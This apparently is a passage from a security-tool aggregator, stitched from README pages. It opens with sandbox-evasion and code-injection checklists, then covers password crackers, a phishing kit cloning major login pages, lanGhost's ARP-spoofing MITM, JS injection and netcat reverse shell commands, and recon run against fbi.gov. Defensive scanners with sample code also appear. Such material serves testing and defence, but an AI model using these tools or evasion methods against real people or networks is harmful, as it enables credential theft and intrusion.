    • "HARDWARE\ACPI\RSDT\VBOX__"
    • "SOFTWARE\Oracle\VirtualBox Guest Additions"
    • "SYSTEM\ControlSet001\Services\VBoxGuest"
    • "SYSTEM\ControlSet001\Services\VBoxMouse"
    • "SYSTEM\ControlSet001\Services\VBoxService"
    • "SYSTEM\ControlSet001\Services\VBoxSF"
    • "SYSTEM\ControlSet001\Services\VBoxVideo"
    • SOFTWARE\VMware, Inc.\VMware Tools
    • SOFTWARE\Wine
  • File system artifacts
    • "system32\drivers\VBoxMouse.sys"
    • "system32\drivers\VBoxGuest.sys"
    • "system32\drivers\VBoxSF.sys"
    • "system32\drivers\VBoxVideo.sys"
    • "system32\vboxdisp.dll"
    • "system32\vboxhook.dll"
    • "system32\vboxmrxnp.dll"
    • "system32\vboxogl.dll"
    • "system32\vboxoglarrayspu.dll"
    • "system32\vboxoglcrutil.dll"
    • "system32\vboxoglerrorspu.dll"
    • "system32\vboxoglfeedbackspu.dll"
    • "system32\vboxoglpackspu.dll"
    • "system32\vboxoglpassthroughspu.dll"
    • "system32\vboxservice.exe"
    • "system32\vboxtray.exe"
    • "system32\VBoxControl.exe"
    • "system32\drivers\vmmouse.sys"
    • "system32\drivers\vmhgfs.sys"
  • Directories artifacts
    • "%PROGRAMFILES%\oracle\virtualbox guest additions\"
    • "%PROGRAMFILES%\VMWare\"
  • Memory artifacts
    • Interrupt Descriptor Table (IDT) location
    • Local Descriptor Table (LDT) location
    • Global Descriptor Table (GDT) location
    • Task state segment trick with STR
  • MAC Address
    • "\x08\x00\x27" (VBOX)
    • "\x00\x05\x69" (VMWARE)
    • "\x00\x0C\x29" (VMWARE)
    • "\x00\x1C\x14" (VMWARE)
    • "\x00\x50\x56" (VMWARE)
  • Virtual devices
    • "\\.\VBoxMiniRdrDN"
    • "\\.\VBoxGuest"
    • "\\.\pipe\VBoxMiniRdDN"
    • "\\.\VBoxTrayIPC"
    • "\\.\pipe\VBoxTrayIPC"
    • "\\.\HGFS"
    • "\\.\vmci"
  • Hardware Device information
    • SetupAPI SetupDiEnumDeviceInfo (GUID_DEVCLASS_DISKDRIVE)
      • QEMU
      • VMWare
      • VBOX
      • VIRTUAL HD
  • System Firmware Tables
    • SMBIOS string checks (VirtualBox)
    • ACPI string checks (VirtualBox)
  • Adapter name
    • VMWare
  • Windows Class
    • VBoxTrayToolWndClass
    • VBoxTrayToolWnd
  • Network shares
    • VirtualBox Shared Folders
  • Processes
    • vboxservice.exe (VBOX)
    • vboxtray.exe (VBOX)
    • vmtoolsd.exe (VMWARE)
    • vmwaretray.exe (VMWARE)
    • vmwareuser (VMWARE)
    • vmsrvc.exe (VirtualPC)
    • vmusrvc.exe (VirtualPC)
    • prl_cc.exe (Parallels)
    • prl_tools.exe (Parallels)
    • xenservice.exe (Citrix Xen)
  • WMI
    • SELECT * FROM Win32_Bios (SerialNumber) (VMWARE)
    • SELECT * FROM Win32_PnPEntity (DeviceId) (VBOX)
    • SELECT * FROM Win32_NetworkAdapterConfiguration (MACAddress) (VBOX)
    • SELECT * FROM Win32_NTEventlogFile (VBOX)
    • SELECT * FROM Win32_Processor (NumberOfCores) (GENERIC)
    • SELECT * FROM Win32_LogicalDisk (Size) (GENERIC)
  • DLL Exports and Loaded DLLs
    • kernel32.dll!wine_get_unix_file_nameWine (Wine)
    • sbiedll.dll (Sandboxie)
    • dbghelp.dll (MS debugging support routines)
    • api_log.dll (iDefense Labs)
    • dir_watch.dll (iDefense Labs)
    • pstorec.dll (SunBelt Sandbox)
    • vmcheck.dll (Virtual PC)
    • wpespy.dll (WPE Pro)
  • CPU
    • Hypervisor presence using (EAX=0x1)
    • Hypervisor vendor using (EAX=0x40000000)
      • "KVMKVMKVM\0\0\0" (KVM)
      • "Microsoft Hv" (Microsoft Hyper-V or Windows Virtual PC)
      • "VMwareVMware" (VMware)
      • "XenVMMXenVMM" (Xen)
      • "prl hyperv " (Parallels)
      • "VBoxVBoxVBox" (VirtualBox)

Anti-Analysis
  • Processes
    • OllyDBG / ImmunityDebugger / WinDbg / IDA Pro
    • SysInternals Suite Tools (Process Explorer / Process Monitor / Regmon / Filemon, TCPView, Autoruns)
    • Wireshark / Dumpcap
    • ProcessHacker / SysAnalyzer / HookExplorer / SysInspector
    • ImportREC / PETools / LordPE
    • JoeBox Sandbox

Macro malware attacks
  • Document_Close / Auto_Close.
  • Application.RecentFiles.Count

Code/DLL Injections techniques
  • CreateRemoteThread
  • SetWindowsHooksEx
  • NtCreateThreadEx
  • RtlCreateUserThread
  • APC (QueueUserAPC / NtQueueApcThread)
  • RunPE (GetThreadContext / SetThreadContext)

Contributors

References


Wavecrack - Web Interface For Password Cracking With Hashcat

A user-friendly web interface to share a hashcat cracking box among multiple users with some pre-defined options.

Screenshots
  • The homepage

  • Adding an hash to crack

  • Seeing the results and some stats


Outline
  • This Web application can be used to launch asynchronous password cracks with hashcat.
  • The interface tries to be as user-friendly as possible; it simplifies choosing the password cracking method and automates the succession of various attack modes.
  • It also displays statistics regarding the cracked passwords and allows exporting the cracked password list in CSV.
  • The application is designed to be used in a multi-user environment with a strict segregation between the cracking results of different users: the user authentication can be done through an LDAP directory or basic auth.

Usage
Wavecrack can be used to do the following:
  • Add new password hashes, choose the attack mode and the crack duration
  • View the past and current cracks for your user with statistics and graphs
  • View the overall load of the platform
  • Upload a password-protected file and extract its hash
The attack modes are followed in the order they are displayed on the hash submit form.
It is also possible to stop a crack. However, every cancellation is final.
A limit to the amount of concurrent cracks can be defined in the settings in order not to reduce the current cracks performance.

Requirements

Installation
  • Install the RabbitMQ server and python-ldap requirements
$ apt-get install libsasl2-dev libldap2-dev libssl-dev rabbitmq-server
$ pip install -r requirements.txt
  • Create a cracker/app_settings.py configuration file from the cracker/app_settings.py.example file and notably edit the Mandatory settings section:
    • The path of hashcat
    • The RabbitMQ connection string: by default, the guest/guest account is used. Be sure to harden your installation
    • The path of the SQLite database
    • The path of the hashcat rules
    • The path of the wordlists
    • The LDAP parameters:
      • IP address
      • port
      • LDAP database for the users
      • Base DN
  • Initialize the local database linked in the cracker/app_settings.py configuration file
$ sqlite3 base.db < base_schema.sql
  • Start the RabbitMQ server
$ sudo service rabbitmq-server start
  • Start Celery from the application folder
$ celery worker -A cracker.celery
Finally, if you don't want to setup your own VM, you can use the Docker-based process described in the docker folder.


    Web Shell Detector - PHP Script That Helps You Find And Identify PHP / CGI (Perl) / ASP / ASPX Shells


    Web Shell Detector is a PHP script that helps you find and identify PHP/CGI (Perl)/ASP/ASPX shells. Web Shell Detector has a “web shells” signature database that helps to identify a “web shell” with up to 99% confidence. By using the latest JavaScript and CSS technologies, Web Shell Detector has a lightweight and friendly interface.

    Contributors
    Piotr Łuczko
    John Thornton

    Detection
    Number of known shells: 604

    Requirements
    PHP 5.x, OpenSSL (only for secure file submission)

    Usage
    To activate Web Shell Detector:
    1. Upload shelldetect.php and shelldetect.db to your root directory
    2. Open shelldetect.php file in your browser
      Example: http://www.website.com/shelldetect.php
    3. Use default username & password
      Username: admin Password: protect
    4. Inspect all strange files; if some files look suspicious, send them to the http://www.shelldetector.com team. After submitting your file, it will be inspected and, if there are any threats, it will be inserted into the “web shell detector” web shells signature database.
    5. If any web shells are found and identified, use your FTP/SSH client to remove them from your web server (IMPORTANT: please be careful because some shells may be integrated into system files!).

    Demo
    http://www.emposha.com/demo/shelldetect/

    Options
    • extension - extensions that should be scanned
    • showlinenumbers - show the line number where a suspicious function is used
    • dateformat - used with access time & modified time
    • language - use another language
    • directory - scan a specific directory
    • task - perform a different task
    • report_format - used with is_cron(true); file format for the report file
    • is_cron - if true, run like a cron job (no output)
    • filelimit - maximum number of files to scan (above 30000 you should scan a specific directory)
    • useget - activate the _GET variable for an easy way to receive tasks
    • authentication - protect the script with a user & password; to disable, simply set to NULL
    • remotefingerprint - fetch the shell signatures database remotely
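    As an added illustration (not Web Shell Detector's own code), the following Python scanner mirrors the extension, directory, filelimit and showlinenumbers options above: it fingerprints each file against a signature database and flags lines that use functions common in shells. The signature entries and fixture files are constructed for the demo, not taken from shelldetect.db.

```python
import hashlib
import os
import re
import tempfile
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed fixture: the body of a "known" shell whose fingerprint is placed in
# the signature DB below. It stands in for an entry of shelldetect.db and is not
# taken from that database.
KNOWN_SHELL_SOURCE = '<?php @eval(base64_decode($_POST["d"])); ?>\n'

# Signature database: SHA-1 of the whole file -> label (constructed entries only).
SIGNATURE_DB: Dict[str, str] = {
    hashlib.sha1(KNOWN_SHELL_SOURCE.encode()).hexdigest(): "constructed one-liner shell",
}

# Heuristic signatures: functions that legitimate application code rarely combines.
SUSPICIOUS: List[Tuple[str, re.Pattern]] = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(")),
    ("command exec", re.compile(r"\b(?:system|shell_exec|passthru|exec|popen|proc_open)\s*\(")),
    ("assert", re.compile(r"\bassert\s*\(")),
    ("request input", re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")),
]


@dataclass
class Finding:
    path: str
    known_shell: Optional[str]                                  # label from SIGNATURE_DB, or None
    hits: List[Tuple[int, str]] = field(default_factory=list)   # (line number, heuristic name)

    @property
    def suspicious(self) -> bool:
        # A signature match is conclusive; heuristics need at least two hits, so a
        # plain form handler that reads $_POST once is not reported.
        return self.known_shell is not None or len(self.hits) >= 2


def scan_file(path: str, showlinenumbers: bool = True) -> Finding:
    with open(path, "rb") as fh:
        data = fh.read()
    finding = Finding(path, SIGNATURE_DB.get(hashlib.sha1(data).hexdigest()))
    text = data.decode("utf-8", errors="replace")
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in SUSPICIOUS:
            if rx.search(line):
                finding.hits.append((lineno if showlinenumbers else 0, name))
    return finding


def scan_directory(directory: str,
                   extensions: Tuple[str, ...] = ("php", "phtml", "cgi", "pl", "asp", "aspx"),
                   filelimit: int = 30000) -> Dict[str, Finding]:
    """Walk `directory`, scan at most `filelimit` files with the given extensions
    ("*" scans everything) and return the suspicious findings keyed by file name."""
    findings: Dict[str, Finding] = {}
    scanned = 0
    for root, _dirs, files in os.walk(directory):
        for name in sorted(files):
            if scanned >= filelimit:
                return findings
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if "*" not in extensions and ext not in extensions:
                continue
            scanned += 1
            finding = scan_file(os.path.join(root, name))
            if finding.suspicious:
                findings[name] = finding
    return findings


def demo_scan() -> Dict[str, Finding]:
    """Build a constructed web root in a temp directory and scan it."""
    root = tempfile.mkdtemp(prefix="shellscan-")
    samples = {
        "known.php": KNOWN_SHELL_SOURCE,
        "loader.php": ('<?php\n'
                       '// constructed: same functions spread over lines, so no hash match\n'
                       '$c = $_REQUEST["x"];\n'
                       'eval(base64_decode($c));\n'),
        "contact.php": '<?php $name = $_POST["name"]; echo "Hi " . htmlspecialchars($name);\n',
        "notes.txt": "eval(base64_decode( -- wrong extension, never scanned\n",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_directory(root)


if __name__ == "__main__":
    for name, f in demo_scan().items():
        print(name, f.known_shell or "heuristic", f.hits)
```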

    Changelog
    • 1.66 thanks to John Thornton for small tweaks and PHP 5.3.3 support
    • 1.64 settings ini file support added (so you can reuse the same settings without changing code), output method rewritten, is_cron fixed, Italian translation added (thanks to Marco Saiu)
    • 1.63 new shell recognition mechanism added, shell signatures updated.
    • 1.62 version of jQuery reverted to 1.7.x due to a bug with the jQuery UI dialog, new type of files added, shell signatures updated
    • 1.61 added new way to send suspicious files, some CSS & code fixes, new shell signatures added
    • 1.6 added support to indicate non-shell files (but those files still need to be removed), loader indicator added
    • 1.52 noindex meta tag added (to remove the script from search results), scan-all-files option added: extension = *
    • 1.51 unpack function update
    • 1.5 unpack function added, application version check added, many warnings fixed, error handler fixed.
    • 1.4 hide suspicious files option added, file scanning changed.
    • 1.3 submission of suspicious files to shelldetector.com changed, email field added with the ability to get notified about suspicious files.
    • 1.2 encryption function added, authentication added, some small bugs fixed
    • 1.1 fingerprint function changed, show-line regex changed
    • 1.0 first version

    SQLmap Tamper-API - SQLMap Tamper API To Accept Tamper Scripts From All Languages


    It's an API for SQLmap tamper scripts that allows you to use your favorite programming language to write your tamper scripts.
    This API removes SQLmap's limitation of accepting only Python for tamper scripts.

    How it works
    tamper-api.py sends the payload and kwargs in JSON format ( {"payload": "", "kwargs": {"headers": {}}} ) to the foreign tamper script (as its first argument).
    From there the foreign script parses the JSON, processes it, and writes it back as JSON to STDOUT, where tamper-api.py reads and parses it and passes the result on to SQLmap.
            ,---------(returns objects)---------,
            |                                   |
        [ sqlmap ] --(sends objects)--> [tamper-api] --(sends json)--> [your-script]
                                             ^                               |
                                             |_________(returns json)________|
    Example
    #!/usr/bin/env ruby
    #
    # Author: KING SABRI | @KINGSABRI
    # Description: Base64 encoding all characters in a given payload
    # Requirements: None
    #
    require 'json'
    require 'base64'

    @json = JSON.parse(ARGV[0])
    @payload = @json["payload"]
    @kwargs = @json["kwargs"]

    @json["payload"] = Base64.urlsafe_encode64(@payload)

    print @json.to_json
    Don't Forget:
    • Copy tamper-api.py script into sqlmap/tamper directory.
    • Check tamper-scripts/[YOUR_LANGUAGE] for practical examples.

    Usage
    sqlmap -u http://example.com/pages.php?page=1 --tamper tamper-api base64encode.rb



    Twebit - Bitcoin Analysis in Twitter With Machine Learning

    Bitcoin analysis with machine learning.

    How it works
    1. Get tweets from Twitter.
    2. Filter tweets.
    3. Classify tweets with the naive Bayes algorithm (positive, negative and neutral).

    Installation
    git clone https://github.com/omergunal/twebit
    cd twebit
    pip3 install -r requirements.txt
    Update your API keys in "twebit.py": go to https://apps.twitter.com/ and get API keys.

    Usage
    python3 twebit.py

    ScreenShots





    Infoga - Email Information Gathering


    Infoga is a tool for gathering e-mail account information (IP, hostname, country, ...) from different public sources (search engines, PGP key servers). It is a really simple tool, but very effective for the early stages of a penetration test or just to know the visibility of your company on the Internet.

    Requirements
    • Python <= 2.7

    Installation
    git clone https://github.com/m4ll0k/Infoga.git infoga
    cd infoga
    pip install -r requirements.txt
    python infoga.py

    Usage
    python infoga.py --domain [DOMAIN] --source [SOURCE] --verbose [LEVEL]

    python infoga.py --info [EMAIL] --verbose [LEVEL]

    Example

    python infoga.py --domain fbi.gov --source google --verbose 3


    python infoga.py --domain  fbi.gov --source all --verbose 3



    DEScrypt-CPU-Collision-Cracker - DEScrypt CPU Collision Cracker


    A Linux-based high-performance DEScrypt CPU cracker written in C++; it deduces the salt and uses a password list to crack hashes.

    Why not use a rainbow table?
    DEScrypt uses by default a two-byte salt (comprised of the characters [a-zA-Z0-9./] [1]), which would mean that you would need to produce roughly 65,536 unique rainbow tables; as a result it's more efficient to use collision cracking to find the unhashed password.

    Features
    • Ability to crack hashes both from a file and individually
    • Detects CPU cores
    • Adjustable number of threads
    • Colon-separated output file
    • Clear readable display
    • Average hash rate of 22,000/s with the default 10 threads

    Commands
    Command   Description
    -------   -----------
    -l=       File location of the hash list
    -i=       Individual hash
    -w=       File location of the wordlist
    -o=       File location of the output file
    -t=       Number of threads (default is 10)

    Getting started

    To compile: g++ -std=c++11 src/main.cpp -pthread -lcrypt -o DEScrypt (-lcrypt links the crypt(3) library the cracker uses)

    Screenshots



    Citations
    [1] - http://man7.org/linux/man-pages/man3/crypt.3.html


    Injectify - Perform Advanced MiTM Attacks On Websites With Ease

    Nmap-Vulners - NSE Script Using Some Well-Known Service To Provide Info On Vulnerabilities


    NSE script based on the Vulners.com API: it uses that well-known service to provide information on vulnerabilities for the detected software versions.

    Dependencies:
    nmap libraries:
    • http
    • json
    • string
    The only thing you should always keep in mind is that the script depends on having software versions at hand, so it only works with the -sV flag.

    Installation
    • Locate where your nmap scripts are located on your system:
      • for *nix systems it might be ~/.nmap/scripts/ or $NMAPDIR
      • for Mac it might be /usr/local/Cellar/nmap/<version>/share/nmap/scripts/
      • for Windows you have to find it yourself
    • Copy the provided script (vulners.nse) into that directory

    Usage
    Use it as straightforward as you can:
    nmap -sV --script vulners <target>
    It is KISS after all.


    Lynis 2.6.1 - Security Auditing Tool for Unix/Linux Systems


    We are excited to announce this major release of the auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next in a series of simplification improvements we have made. There is a risk of breaking your existing configuration.

    Lynis is an open source security auditing tool, used by system administrators, security professionals, and auditors to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

    Supported operating systems

    The tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:
    • AIX
    • FreeBSD
    • HP-UX
    • Linux
    • Mac OS
    • NetBSD
    • OpenBSD
    • Solaris
    • and others
    It even runs on systems like the Raspberry Pi and several storage devices!

    Installation optional

    Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

    How it works

    Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of a set of steps, from initializing the program up to the report.

    Steps
    1. Determine operating system
    2. Search for available tools and utilities
    3. Check for Lynis update
    4. Run tests from enabled plugins
    5. Run security tests per category
    6. Report status of security scan
    Besides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

    Opportunistic Scanning

    Lynis scanning is opportunistic: it uses what it can find.
    For example, if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates so they can be scanned later as well.

    In-depth security scans

    By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

    Use cases

    Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
    • Security auditing
    • Compliance testing (e.g. PCI, HIPAA, SOx)
    • Vulnerability detection and scanning
    • System hardening

    Resources used for testing

    Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
    • Best practices
    • CIS
    • NIST
    • NSA
    • OpenSCAP data
    • Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)

    Lynis Plugins

    Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

    Changelog
    Upgrade note
    Changes:
    --------
    * Tests can have more than 1 required OS (e.g. Linux OR NetBSD)
    * Added 'system-groups' option to profile (Enterprise users)
    * Overhaul of default profile and migrate to new style (setting=value)
    * Show warning if old profile options are used
    * Improved detection of binaries
    * New group 'usb' for tests related to USB devices

    Tests:
    ------
    * [FILE-6363] - New test for /var/tmp (sticky bit)
    * [MAIL-8802] - Added exim4 process name to improve detection of Exim
    * [NETW-3030] - Changed name of dhcp client name process and added udhcpc
    * [SSH-7408] - Restored UsePrivilegeSeparation
    * [TIME-3170] - Added chrony configuration file for NetBSD


    lanGhost - A LAN dropbox chatbot controllable via Telegram


    A LAN dropbox chatbot controllable via Telegram

    Installation: 

    You will need a Raspberry Pi with fresh Raspbian/Kali on the SD card, because you don't want anything else running in the background.
    Boot up the Pi, get an SSH shell or connect a monitor and a keyboard, and enter these commands:
    $ sudo apt update && sudo apt install python3 python3-pip
    $ git clone https://github.com/xdavidhu/lanGhost
    $ cd lanGhost
    $ sudo ./setup.py
    Please read the questions/messages while running the setup script!

    Step 1/4 - setup.py
    [+] Please enter the name of the network interface connected/will
    be connected to the target LAN. Default wired interface is 'eth0',
    and the default wireless interface is 'wlan0' on most systems, but
    you can check it in a different terminal with the 'ifconfig' command.

    Step 2/4 - setup.py
    [+] Please create a Telegram API key by messaging @BotFather on Telegram
    with the command '/newbot'.

    After this, @BotFather will ask you to choose a name for your bot.
    This can be anything you want.

    Lastly, @BotFather will ask you for a username for your bot. You have
    to choose a unique username here which ends with 'bot'. For
    example: xdavidbot. Make note of this username, since later
    you will have to search for this to find your bot, which lanGhost
    will be running on.

    After you send you username of choise to @BotFather, you will recieve
    your API key.


    Step 3/4 - setup.py
    [+] Now for lanGhost to only allow access to you, you need to verify yourself.

    Send the verification code below TO THE BOT you just created. Just search for your
    bot's @username (what you sent to @BotFather) to find it.

    [+] Verification code to send: ******

    Step 4/4 - setup.py
    [+] Do you want lanGhost to start on boot? This option is necessary if you are using
    this device as a dropbox, because when you are going to drop this device into a
    network, you will not have the chanse to start lanGhost remotely! (autostart works
    by adding a new cron '@reboot' entry)

    If you are ready with the setup just reboot the Pi and lanGhost will start right up!

    Usage:

    warnings:

    Using lanGhost on networks bigger than /24 is not recommended because the scans will take too long.
    lanGhost is not quiet. Anyone monitoring the traffic can see the ARP packets!

    Drop it into a network:
    If you have selected yes at step 4/4 (autostart), the Pi is fully set up for dropping. lanGhost should start up on boot and send you a message on Telegram with the text: lanGhost started!
    Make sure to try it out in your lab first and test if lanGhost is responding to your messages!
    If you are all set, just connect it to the target network by plugging in the Ethernet cable into the Pi and connecting the power via micro USB and you are ready to go!
    (lanGhost can also work over WiFi, but you will need to set up wpa_supplicant to connect to the network automatically first)

    Available commands:
    /scan - Scan LAN network
    /scanip [TARGET-IP] - Scan a specific IP address.
    /kill [TARGET-IP] - Stop the target's network connection.
    /mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
    /replaceimg [TARGET-IP] - Replace HTTP images requested by target.
    /injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
    /spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
    /attacks - View currently running attacks.
    /stop [ATTACK-ID] - Stop a currently running attack.
    /restart - Restart lanGhost.
    /reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
    /help - Display the help menu.
    /ping - Pong.

    Attack system:
    You can start an attack by using one of these commands: /kill, /mitm, /replaceimg, /injectjs, /spoofdns
    After you have one or more attacks running, you can use the /attacks command to get a list of them containing the ATTACK-IDs.
    To stop an attack type /stop [ATTACK-ID].

    Reverse shell:

    warning:

    /reversesh only makes a netcat TCP connection which is not encrypted and all the traffic can be monitored! Only use it for emergency fixes or for setting up an encrypted reverse connection if necessary.

    The /reversesh command is for getting a reverse shell on the Pi when it's not accessible from the outside.
    To use the /reversesh command you will need to have a server listening for the shell.
    Netcat command to start up the listener on your server:
    $ nc -l 0.0.0.0 [PORT]
    Telegram command:
    /reversesh [IP-of-your-listening-server] [PORT]

    Attacks:
    • /kill - Stops the internet connectivity for the target.
    • /mitm - Captures HTTP and DNS traffic from the target and sends it in text messages.
    • /replaceimg - Replaces HTTP images for the target to what picture you send to the bot.
    • /injectjs - Injects JavaScript into every HTTP HTML response for the target. You need to host the JS file on your server and give the URL as a parameter.
    • /spoofdns - Spoofs DNS responses for the target.
    All attacks use ARP Spoofing!

    Scans:
    • /scan - Scans the local network and returns the hosts online. Uses nmap -sn scan to discover hosts.
    • /scanip - Scans an IP address for open ports and other info. Uses nmap -sS scan.

    Notifications:
    You will get a message every time when a new device connects/leaves the network.

    Videos:

    /injectjs


    /kill


    /replaceimg


    /mitm


    /spoofdns




    SocialFish - Ultimate phishing tool with Ngrok integrated


    Ultimate phishing tool with Ngrok integrated.

    PREREQUISITES
    • Python 2.7
    • Wget from Python
    • PHP

    TESTED ON
    Kali Linux - ROLLING EDITION

    CLONE
    git clone https://github.com/UndeadSec/SocialFish.git

    RUNNING
    cd SocialFish
    sudo pip install -r requirements.txt
    python SocialFish.py

    AVAILABLE PAGES
    + Facebook:
    • Traditional Facebook login page.
    • Advanced login with Facebook.
    + Google:
    • Traditional Google login page.
    • Advanced login with Facebook.
    + LinkedIN:
    • Traditional LinkedIN login page.
    + Github:
    • Traditional Github login page.
    + Stackoverflow:
    • Traditional Stackoverflow login page.
    + Wordpress:
    • Similar Wordpress login page.


    Social Recon - Investigate The Online Presence And Footprint Of Someone


    This application locates and compiles information about online personalities, given a username and/or email address. Use this to investigate your own online presence, summarize the digital footprint of someone you know, or uncover the person behind a specific username.

    Getting Started
    • Clone or fork the repo to your machine.
    • Once downloaded, cd into the osint-scraper directory.
    • Begin a new virtual environment with Python 3 and activate it.
    • cd into the next osint-scraper directory. It should be at the same level of the setup.py file.
    • pip install -e . on the command line to install all dependencies.
    • pip install pytest
    • $ pserve development.ini --reload to serve the application on http://localhost:6543

    Dependencies
    See requirements.txt and setup.py


    PiDense - Monitor Illegal Wireless Network Activities (Fake Access Points)


    Monitor illegal wireless network activities.
    • Similar SSID broadcasts
    • Same SSID broadcasts
    • Calculates unencrypted wireless networks density
    • Watches SSID broadcasts at the blacklist.

    Capabilities (Now)
    • Calculates Unencrypted wireless network density
    • Finds same ssid, different encryption

    Working Principle for PiDense
    • Collects all the packets from Wireless Networks.
    • Analyzes all the beacon packets.
    • If PiDense detects more open (OPN) networks than the defined threshold, or the same SSID advertised with different encryption,
    • it logs the activity with some extra information using the defined template.
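    As an added illustration (not PiDense's own code), the following Python module implements the beacon-analysis rules described above over constructed beacon records instead of live scapy captures: open-network density against a threshold, the same SSID seen with different encryption, look-alike SSIDs, and a blacklist watch. The Beacon fields and encryption labels are this example's assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Sequence, Set, Tuple


@dataclass(frozen=True)
class Beacon:
    """One parsed 802.11 beacon frame (field names are this example's own)."""
    ssid: str
    bssid: str
    encryption: str  # "OPN" for an unencrypted network, else e.g. "WEP", "WPA", "WPA2"
    channel: int


def unique_aps(beacons: Iterable[Beacon]) -> Dict[str, Beacon]:
    """An AP beacons several times a second; keep one record per BSSID."""
    return {b.bssid: b for b in beacons}


def open_network_density(beacons: Iterable[Beacon]) -> float:
    """Share of access points that advertise an open (OPN) network."""
    aps = unique_aps(beacons)
    if not aps:
        return 0.0
    return sum(1 for b in aps.values() if b.encryption == "OPN") / len(aps)


def same_ssid_different_encryption(beacons: Iterable[Beacon]) -> Dict[str, List[str]]:
    """SSIDs advertised with more than one encryption type (evil-twin indicator)."""
    encs: Dict[str, Set[str]] = defaultdict(set)
    for b in unique_aps(beacons).values():
        encs[b.ssid].add(b.encryption)
    return {ssid: sorted(e) for ssid, e in encs.items() if len(e) > 1}


def _levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot look-alike SSIDs such as CorpWiFi / CorpWlFi."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def similar_ssids(beacons: Iterable[Beacon], max_distance: int = 1) -> Set[Tuple[str, str]]:
    """Pairs of distinct SSIDs within `max_distance` edits of each other."""
    ssids = sorted({b.ssid for b in beacons})
    return {(a, b) for i, a in enumerate(ssids) for b in ssids[i + 1:]
            if _levenshtein(a, b) <= max_distance}


def blacklist_hits(beacons: Iterable[Beacon], blacklist: Sequence[str]) -> List[Beacon]:
    return [b for b in unique_aps(beacons).values() if b.ssid in blacklist]


def analyze(beacons: Sequence[Beacon], open_threshold: float = 0.5,
            blacklist: Sequence[str] = ()) -> List[str]:
    """Apply the rules and return log lines in a simple template."""
    alerts = []
    density = open_network_density(beacons)
    if density > open_threshold:
        alerts.append(f"[OPN] open network density {density:.0%} exceeds {open_threshold:.0%}")
    for ssid, encs in same_ssid_different_encryption(beacons).items():
        alerts.append(f"[TWIN] SSID {ssid!r} seen with encryptions {', '.join(encs)}")
    for a, b in sorted(similar_ssids(beacons)):
        alerts.append(f"[SIMILAR] SSIDs {a!r} and {b!r} differ by at most one character")
    for b in blacklist_hits(beacons, blacklist):
        alerts.append(f"[BLACKLIST] SSID {b.ssid!r} from {b.bssid} on channel {b.channel}")
    return alerts


# Constructed capture: one legitimate corporate AP, an open AP cloning its SSID,
# a look-alike SSID, an open guest AP (beaconed twice) and a blacklisted name.
SAMPLE_BEACONS = [
    Beacon("CorpWiFi", "aa:aa:aa:aa:aa:01", "WPA2", 6),
    Beacon("CorpWiFi", "aa:aa:aa:aa:aa:02", "OPN", 6),
    Beacon("CorpWlFi", "aa:aa:aa:aa:aa:03", "WPA2", 11),
    Beacon("Guest", "aa:aa:aa:aa:aa:04", "OPN", 1),
    Beacon("Guest", "aa:aa:aa:aa:aa:04", "OPN", 1),
    Beacon("FreeAirportWiFi", "aa:aa:aa:aa:aa:05", "OPN", 1),
]

if __name__ == "__main__":
    for line in analyze(SAMPLE_BEACONS, blacklist=("FreeAirportWiFi",)):
        print(line)
```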

    Soon to be added features
    • Blacklist SSID analysis
    • Company name setting for illegal wireless attack activities (Monitoring)

    Example



    Usage

    Requirements
    • Hardware: TP LINK TL-WN722N
    • Modules: scapy, time, termcolor, argparse

    Kali Linux:
    Download PiDense:
    git clone https://github.com/WiPi-Hunter/PiDense.git

    Install the Python libraries:
    pip install termcolor
    It's done!

    Run the program with following command:
    Monitor mode:
    airmon-ng start wlan0 (replace wlan0 with your interface, e.g. wlan1; this puts it into monitor mode)

    or

    ifconfig wlan0 down
    iwconfig wlan0 mode Monitor
    ifconfig wlan0 up

    Run:
    cd PiDense
    python pidense.py -h


    RDPY - Remote Desktop Protocol in Twisted Python


    RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event-driven network engine Twisted. RDPY supports the standard RDP security layer, RDP over SSL and NLA authentication (through the NTLMv2 authentication protocol).

    RDPY provides the following RDP and VNC binaries:
    • RDP Man In The Middle proxy which records sessions
    • RDP Honeypot
    • RDP screenshoter
    • RDP client
    • VNC client
    • VNC screenshoter
    • RSS Player

    Build
